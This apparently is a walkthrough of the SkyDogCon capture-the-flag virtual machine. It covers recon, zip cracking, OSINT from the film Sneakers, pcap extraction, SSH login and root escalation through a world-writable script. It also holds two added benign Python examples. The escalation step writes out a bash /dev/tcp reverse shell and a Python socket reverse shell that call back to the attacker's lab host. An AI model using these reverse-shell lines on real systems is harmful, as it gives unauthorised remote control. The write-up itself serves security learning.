Objective

From Vulnhub: “The purpose of this CTF is to find all six flags hidden throughout the server by hacking network and system services”.

Flags

The six flags are in the form of flag{MD5 Hash}, such as flag{1a79a4d60de6718e8e5b326e338ae533}

  • Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)
  • Flag #2 When do Androids Learn to Walk?
  • Flag #3 Who Can You Trust?
  • Flag #4 Who Doesn’t Love a Good Cocktail Party?
  • Flag #5 Another Day at the Office
  • Flag #6 Little Black Box

Walkthrough

The first thing I do once the IP address is identified is see what’s running.

root@Oak:~# nmap -A -p- 10.0.2.30 
 
Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-01 19:47 EDT 
Nmap scan report for 10.0.2.30 
Host is up (0.00025s latency). 
Not shown: 65533 closed ports 
PORT STATE SERVICE VERSION 
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) 
| ssh-hostkey: 
| 1024 c8:f7:5b:33:8a:5a:0c:03:bb:6b:af:2d:a9:70:d3:01 (DSA) 
| 2048 01:9f:dd:98:ba:be:de:22:4a:48:4b:be:8d:1a:47:f4 (RSA) 
|_ 256 f8:a9:65:a5:7c:50:1d:fd:71:57:92:38:8b:ee:8c:0a (ECDSA) 
80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 
| http-robots.txt: 252 disallowed entries (15 shown) 
| /search /sdch /groups /catalogs /catalogues /news /nwshp 
| /setnewsprefs? /index.html? /? /?hl=*& /?hl=*&*&gws_rd=ssl 
|_/addurl/image? /mail/ /pagead/ 
|_http-server-header: Apache/2.4.7 (Ubuntu) 
|_http-title: Site doesn't have a title (text/html). 
MAC Address: 08:00:27:EF:0B:15 (Oracle VirtualBox virtual NIC) 
Device type: general purpose 
Running: Linux 3.X|4.X 
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 
OS details: Linux 3.2 - 4.4 
Network Distance: 1 hop 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 
 
TRACEROUTE 
HOP RTT ADDRESS 
1 0.25 ms 10.0.2.30 
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 12.73 seconds

Options Explained – nmap

  • -A = Aggressive scan options (OS detection, version detection, default scripts and traceroute)
  • -p- = Scan all 65535 ports

The clue for the first flag is "Home Sweet Home or (A Picture is Worth a Thousand Words)"

This clue had me thinking that the flag is contained within an image.

The landing page of the web service on port 80 is the image of the SkyDogCon CTF. I used wget to pull the image and then explored the EXIF data with exiftool.

wget http://10.0.2.30/SkyDogCon_CTF.jpg
exiftool SkyDogCon_CTF.jpg

Sure enough flag 1 has been found.

XP Comment                      : flag{abc40a2d4e023b42bd1ff04891549ae2}
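How the XP Comment field that held flag 1 is laid out inside the JPEG, as an added example that is not part of the original write-up: a small parser for the EXIF XPComment tag (0x9C9C) written here from scratch instead of calling exiftool, run against a JPEG constructed in memory (the real SkyDogCon_CTF.jpg is not embedded).

```python
import struct
# Added example, not the write-up's tooling: extract the EXIF "XP Comment" tag
# (0x9C9C, the field that held flag 1) from a JPEG without exiftool. Only the
# JPEG/TIFF structures needed for that one tag are parsed.
XP_COMMENT = 0x9C9C  # Windows-specific EXIF tag, value stored as UTF-16LE bytes

def build_jpeg_with_xp_comment(comment):
    """Construct (in memory) a minimal JPEG whose EXIF IFD0 holds one XPComment (2+ chars)."""
    payload = comment.encode("utf-16-le") + b"\x00\x00"
    ifd_offset = 8                            # IFD0 follows the 8-byte TIFF header
    data_offset = ifd_offset + 2 + 12 + 4     # entry count + one entry + next-IFD link
    tiff = b"II" + struct.pack("<HI", 42, ifd_offset)          # little-endian TIFF
    tiff += struct.pack("<H", 1)                               # one directory entry
    tiff += struct.pack("<HHII", XP_COMMENT, 1, len(payload), data_offset)
    tiff += struct.pack("<I", 0) + payload                     # no IFD1, then data
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"

def read_xp_comment(data):
    """Walk the JPEG segments, find APP1/EXIF and return the XPComment text or None."""
    if data[:2] != b"\xff\xd8":               # not a JPEG (SOI marker missing)
        return None
    pos = 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):            # EOI or start of scan: no EXIF ahead
            break
        seglen = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        segment = data[pos + 4:pos + 2 + seglen]
        if marker == 0xE1 and segment.startswith(b"Exif\x00\x00"):
            return _xp_comment_from_tiff(segment[6:])
        pos += 2 + seglen
    return None

def _xp_comment_from_tiff(tiff):
    endian = "<" if tiff[:2] == b"II" else ">"   # byte-order mark: II or MM
    magic, ifd = struct.unpack(endian + "HI", tiff[2:8])
    if magic != 42:
        return None
    count = struct.unpack(endian + "H", tiff[ifd:ifd + 2])[0]
    for i in range(count):
        entry = ifd + 2 + 12 * i
        tag, typ, n, value = struct.unpack(endian + "HHII", tiff[entry:entry + 12])
        if tag == XP_COMMENT and typ == 1:    # type 1 = BYTE; <=4 bytes are inline
            raw = tiff[entry + 8:entry + 8 + n] if n <= 4 else tiff[value:value + n]
            return raw.decode("utf-16-le", errors="replace").rstrip("\x00")
    return None

if __name__ == "__main__":
    print(read_xp_comment(build_jpeg_with_xp_comment("flag{constructed-sample-value}")))
```

Pointing read_xp_comment at the bytes of a real file shows the same field exiftool prints as "XP Comment".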

Since the flags use an MD5 hash, I was curious if they could be hashed messages.

A quick trip to crackstation and my curiosity was validated. The first flag translates to: Welcome Home

The 2nd flag clue is "When do Androids Learn to Walk?"

Ok, that one was pretty obvious, so a quick look at robots.txt and the 2nd flag is found.

http://10.0.2.30/robots.txt
Congrats Mr. Bishop, your getting good - flag{cd4f10fcba234f0e8b2f60a490c306e6}

Flag 2 hash translates to Bots

Ok then, time for flag three.

The clue for the 3rd flag is a little more ambiguous. "Who Can You Trust?"

After using Burp to spider the website I found the URL 10.0.2.30/Setec/

The folder contains a picture from the movie Sneakers and the words Too Many Secrets

TooManySecrets

I examined the image for hidden gems but came up empty. The source of the /Setec folder contains some commented-out JavaScript. It appears to be the standard Google tracking script with a neat Easter egg.

var pageTracker = _gat._getTracker_Approved("NSA-Agent-Abbott"; AKA Darth Vader);

This is another reference to the movie Sneakers. James Earl Jones played the NSA agent Bernard Abbott and voiced Darth Vader.

The image displayed at http://10.0.2.30/Setec/ resides in the Astronomy folder.

I navigated to http://10.0.2.30/Setec/Astronomy/ and saw that it has indexing enabled. Inside the Astronomy folder is a zip file called Whistler.zip. I didn’t realize it yet, but this is yet another reference to Sneakers.

I pulled down the zip file and noticed that it’s password protected. I used fcrackzip and rockyou.txt to crack it.

root@Oak:~/Downloads/skydogctf/Whistler# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u Whistler.zip

PASSWORD FOUND!!!!: pw == yourmother

Options Explained – fcrackzip

  • -D = use a dictionary
  • -p = use string as initial password/file (here, the path to rockyou.txt)
  • -u = use unzip to weed out wrong passwords

Flag 3 has been found!

flag{1871a3c1da602bf471d3d76cc60cdb9b}

This flag translates to yourmother

Contained in the zip is a text file titled QuesttoFindCosmo.txt. The text in the file is:

Time to break out those binoculars and start doing some OSINT

The clue for the 4th flag was "Who Doesn’t Love a Good Cocktail Party?" The clue didn’t help. This is where I was stumped. I reached out to @jamesbower for a clue. He mentioned that the CTF follows the movie Sneakers in chronological order. I had not seen Sneakers since the 90’s probably and didn’t remember most of the movie.

I rented Sneakers from Amazon and gave it a watch.

The scene that held the answer was painfully obvious. While I was watching the movie I had also managed to find a script online. I used the script to create a wordlist that I could then use with Dirb.

cewl --write fscipt.lst -m 3 http://127.0.0.1/fscript.html

Options Explained – cewl

  • --write = write the output to the file
  • -m = minimum word length

I copied the Sneakers script into a local file to run cewl from my localhost to improve performance.

At the same time that dirb found the hidden folder with the next clue, the scene that held the answer came on.

The scene with the clue as described from the script:

They arrive a couple of hundred yards from a big, modern
	building.  Carl looks around through binoculars.  A flag
	flies out front.  A corporate sign:

				PlayTronics
				The Future of Toys

I entered http://10.0.2.30/PlayTronics/ into the browser and boom! Flag 4 was found.

flag{c07908a705c22922e6d416e0e1107d99}

I checked dirb and saw that it too had found the hidden folder.

root@Oak:~/Downloads/skydogctf# dirb http://10.0.2.30 fscipt.lst -w

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu May  5 20:08:43 2016
URL_BASE: http://10.0.2.30/
WORDLIST_FILES: fscipt.lst
OPTION: Not Stoping on warning messages

-----------------

GENERATED WORDS: 3739                                                          

---- Scanning URL: http://10.0.2.30/ ----
==> DIRECTORY: http://10.0.2.30/Setec/                                         
==> DIRECTORY: http://10.0.2.30/PlayTronics/                                   
                                                                               
---- Entering directory: http://10.0.2.30/Setec/ ----
==> DIRECTORY: http://10.0.2.30/Setec/Astronomy/                               
                                                                               
---- Entering directory: http://10.0.2.30/PlayTronics/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://10.0.2.30/Setec/Astronomy/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Thu May  5 20:08:52 2016
DOWNLOADED: 14956 - FOUND: 0

Options Explained – dirb

  • -w = Don’t stop on WARNING messages.

Flag 4 translated to leroybrown

This was different from the rest of the flags. All the previous flags referenced the clue used to find them; this one did not.

I Googled Leroy Brown and Sneakers and came upon the karaoke scene where they sang Leroy Brown at the Dim Sum bar.

Inside the PlayTronics folder is a pcap file called companytraffic.pcap. The clue for the 5th flag is "Another Day at the Office". This clue didn’t help me too much.

I downloaded the file and explored it with Wireshark. Most of the traffic was encrypted, but at the end of the pcap was some traffic sent over HTTP in clear text. Upon further examination I realized that it contained an audio file.

I extracted the audio file with tcpflow.

tcpflow -a -r companytraffic.pcap

Options Explained – tcpflow

  • -a = do ALL post-processing.
  • -r = read packets from tcpdump pcap file

I then checked the file with the file command:

root@Oak:~/Downloads/skydogctf/pcap# file 054.239.172.025.00080-192.168.002.223.35144-HTTPBODY-001.mpga
054.239.172.025.00080-192.168.002.223.35144-HTTPBODY-001.mpga: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, JntStereo

I listened to the file and I could hear Dr. Werner Brandes say "Hi, my name is Werner Brandes. My voice is my passport. Verify me." It was a recording from the movie.

I tried to use this string to find yet another hidden folder. I couldn’t find anything, so I thought that this clue was telling me that I had to log into ssh, especially since in the movie they were trying to get Dr. Brandes to say these words so they could gain access to a restricted area.

The previous flag said leroybrown and knowing that they sang Leroy Brown at the Dim Sum bar, I thought that scene would give me the clue to login to ssh.

During the karaoke scene, Liz used the alias Doris while she was seducing Dr. Brandes. I figured the password would be leroybrown based on the previous flag. I then assumed the username would be Doris.

I was wrong. So then I figured that the username had to be related to Dr. Brandes. I tried several permutations of the username using Dr. Brandes’ name, then finally tried wernerbrandes with the password leroybrown. And access was granted.

root@Oak:~/Downloads/skydogctf# ssh wernerbrandes@10.0.2.30
wernerbrandes@10.0.2.30's password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic x86_64)

* Documentation: https://help.ubuntu.com/

System information as of Tue May 3 23:18:05 EDT 2016

System load: 0.4 Processes: 96
 Usage of /: 13.3% of 17.34GB Users logged in: 0
 Memory usage: 21% IP address for eth0: 10.0.2.30
 Swap usage: 0%

Graph this data and manage this system at:
 https://landscape.canonical.com/

152 packages can be updated.
81 updates are security updates.

Last login: Tue May 3 23:18:08 2016 from 10.0.2.27
wernerbrandes@skydogctf:~$

Flag 5 found!

wernerbrandes@skydogctf:~$ ls
flag.txt
wernerbrandes@skydogctf:~$ cat flag.txt 
flag{82ce8d8f5745ff6849fa7af1473c9b35}

When I hit up crackstation to crack this hash, I was surprised to discover that it had not been cracked. The clue for the last flag is "Little Black Box".

Now that I had access I knew that the next step was to get root.

I started by looking for files that were world writable and found one called sanitizer.py.

wernerbrandes@skydogctf:~$ find / -perm -0002 -type f -not -path "/proc*" -exec ls -la {} \; 2>/dev/null 
-rwxrwxrwx 1 root root 341 May  3 23:16 /lib/log/sanitizer.py
-rw-rw-rw- 1 root root 0 May  2 15:22 /sys/kernel/security/apparmor/.access

Options Explained – find

  • / = Start the search from /
  • -perm -0002 = Files with the "other" write bit set (world-writable)
  • -type f = Regular files only
  • -not expr = True if expr is false
  • -path "/proc*" = Matches paths under /proc, so with -not it excludes them
  • -exec ls -la {} \; = Runs ls -la on each matching file
  • 2>/dev/null = Redirects stderr (permission-denied errors) to /dev/null

Usually when a file like this is found, it is run via a cron job as root. I didn’t see that this file was called by any cron jobs, but the script deletes the contents of the /tmp directory. I created a test file and placed it in /tmp and a short time later, the file was gone. I knew this was my escalation point.
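A defender-side check for the weakness used here, added as an example and not part of the original write-up: a Python audit that reports world-writable regular files the way the find command above does, rating executable ones as critical. It runs on a constructed temporary tree shaped like the one on the box; pointing world_writable_files at "/" audits a real host.

```python
import os
import stat
import tempfile

# Added audit helper (not from the write-up): list regular files that any user
# can write to, the weakness that made /lib/log/sanitizer.py an escalation
# point. A world-writable file that is also executable is rated "critical",
# since anything that runs it as root will run whatever a local user wrote.

def world_writable_files(root, skip=("/proc", "/sys", "/dev")):
    """Return sorted (path, risk, owner_uid) tuples for world-writable regular files."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune pseudo-filesystems, like the "-not -path /proc*" filter above.
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_IWOTH:
                continue
            executable = bool(st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
            risk = "critical" if executable else "warning"
            findings.append((path, risk, st.st_uid))
    return sorted(findings)

def demo():
    """Audit a constructed tree shaped like the one found on the box."""
    base = tempfile.mkdtemp()
    lib_log = os.path.join(base, "lib", "log")
    os.makedirs(lib_log)
    samples = {
        os.path.join(lib_log, "sanitizer.py"): 0o777,  # -rwxrwxrwx, as on the box
        os.path.join(base, "notes.txt"): 0o666,        # writable but not executable
        os.path.join(base, "readme.txt"): 0o644,       # not world-writable
    }
    for path, mode in samples.items():
        with open(path, "w") as fh:
            fh.write("#!/usr/bin/env python\n")
        os.chmod(path, mode)
    return {os.path.relpath(p, base): risk for p, risk, _ in world_writable_files(base)}

if __name__ == "__main__":
    for path, risk in demo().items():
        print("%-8s %s" % (risk, path))
```

The owner uid is returned alongside each finding so a root-owned hit, like the one above, can be prioritised; on a real host, cross-check critical hits against cron and systemd timers.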

I decided that I wanted a reverse shell and used the Python reverse shell from Pentest Monkey.

wernerbrandes@skydogctf:~$ cat /lib/log/sanitizer.py 
#!/usr/bin/env python
#import os
#import sys
#try:
#    os.system('bash -i >& /dev/tcp/10.0.2.27/443 0>&1')

#except:
#    sys.exit()
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.27",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

I fired up a netcat listener and a reverse shell was born.

I now had root and the final flag.

root@Oak:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.0.2.27] from (UNKNOWN) [10.0.2.30] 51469
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# hostname
skydogctf
# cat /root/BlackBox/flag.txt
flag{b70b205c96270be6ced772112e7dd03f}

Congratulations!! Martin Bishop is a free man once again!  Go here to receive your reward.
/CongratulationsYouDidIt#

Options Explained – nc

  • -n = numeric-only IP addresses, no DNS
  • -l = listen mode, for inbound connects
  • -v = verbose
  • -p = local port number

The 6th flag didn’t yield any results from crackstation either but when I navigated to the hidden folder I was greeted with a video from the Karate Kid playing the song You’re the Best Around.

You're The Best Around

This CTF was pretty captivating. I really enjoyed the OSINT challenge mixed in. It was a nice change from the other boot2roots. I always get a thrill out of getting an opportunity to use new tools and learning new techniques. This CTF delivered and I look forward to the next SkyDogCon CTF.

A big thanks to @jamesbower and the @Vulnhub team.

 
